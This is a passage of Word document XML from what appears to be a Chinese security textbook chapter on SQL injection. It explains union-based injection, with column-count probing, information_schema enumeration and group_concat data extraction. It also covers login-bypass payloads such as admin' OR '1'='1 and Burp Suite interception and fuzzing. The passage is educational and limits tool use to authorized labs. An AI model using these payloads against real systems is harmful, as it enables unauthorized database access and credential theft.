        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（闭合单引号）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">" OR "1"="1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（闭合双引号）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1) OR 1=1 --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（闭合圆括号后注释）等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">联合查询注入机理：列对齐与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">当注入点确认且查询结果有回显（即应用将查询结果直接渲染在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应中）时，联合查询注入（UNION-Based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Injection）是最直接的利用方法。其核心思想是利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">操作符，将攻击者构造的第二个查询结果附加到原本的合法查询结果集后面，从而在页面回显位置读取数据库的任意内容。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">成功的前提是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">列对齐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——第二个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">返回的列数必须与原查询的列数严格一致。攻击者无法直接知道原查询的列数，需使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT NULL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行探测：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1090"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY n --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：依次尝试</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">、……，当</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">返回结果而</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY n+1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报错时，原查询的列数为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1090"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT NULL,NULL,...,NULL --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：用递增数量的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NULL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">构造联合查询，当列数匹配时查询成功，否则报错。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一旦确定列数，攻击者需要定位哪些列的回显会出现在页面中。例如原查询</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT id,name,price FROM products WHERE id=?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，若页面只显示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">price</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，则只有联合查询中对应位置的列内容可见。攻击者用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 1,'visible-1','visible-2'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">来标记回显位置（各列用独特字面量标识），从而知道在哪个位置替换为恶意子查询。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">确定回显位置后，攻击者便可以从数据库元数据表</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">information_schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（MySQL/MariaDB）中枚举数据库结构。该库是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标准定义的只读信息模式，记录了当前数据库服务器中所有数据库、表、列的结构信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标准枚举路径如下（以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL/MariaDB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为例，实际语法在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL、SQL Server、Oracle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中有差异）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1091"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 1,group_concat(schema_name),3 FROM information_schema.schemata --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：列出所有数据库名。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1091"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema='&lt;DATABASE_NAME&gt;' --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：列出指定数据库中的所有表名。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1091"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_schema='&lt;DATABASE_NAME&gt;' AND table_name='&lt;TABLE_NAME&gt;' --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：列出指定表的所有列名。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1091"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">最终数据提取：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 1,group_concat(&lt;COLUMN_NAME&gt;),3 FROM &lt;DATABASE_NAME&gt;.&lt;TABLE_NAME&gt; --</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">group_concat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">聚合函数，将多行结果拼接为单个字符串（中间默认用逗号分隔），从而在单个回显位置展示全部数据，这是手工注入中常见的紧凑化技术。若无</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">group_concat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL Server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">STRING_AGG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，Oracle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">LISTAGG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），攻击者可用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">LIMIT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">逐行偏移读取。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">恒真条件与认证绕过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR '1'='1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是最经典的注入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">之一，原理如前所述。其简化变体包括</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR 1=1 --</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR 'a'='a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等。在登录表单中，如果后端查询为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM users WHERE username='&lt;input_user&gt;' AND password='&lt;input_pass&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，攻击者提交</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin' OR '1'='1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">作为用户名，SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">变为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM users WHERE username='admin' OR '1'='1' AND password='...'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。注意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AND </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的优先级高于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">OR，因此条件等价于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">username='admin' OR ('1'='1' AND password='...')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">'1'='1'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">恒真，整体</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">恒真，返回全表第一行用户（通常是管理员）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[简化]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以上示例仅用于说明认证绕过的逻辑原理，实际应用中数据库结构、编码方式、框架</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ORM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">层会显著影响注入效果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">交叉回指框：Burp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">改包在注入中的角色</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本书第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章已详细讲解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理拦截的基础配置与单次重放操作。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入场景中，Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的“拦截-修改-放行”循环是攻击者的核心工作流程：拦截一个可能的注入点请求（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/products.php?id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> POST body </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">username=test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Proxy → Intercept </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中修改参数值为注入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">payload（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id=1' ORDER BY 3 --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），放行请求，在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Proxy → HTTP History </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或浏览器中观察响应。若需批量测试多种</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">payload，可将请求发送到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Repeater </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块，逐次微调并观察差异；或将请求发送到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Intruder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块，用字典对指定参数位置进行自动化</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">fuzz（注意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Intruder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">产生的请求量可能触发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或速率限制，仅限授权实验网络内使用）。Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">社区版已包含上述核心模块，完全满足教学和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CTF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">场景需求。</w:t>
      </w:r>
      <w:r>
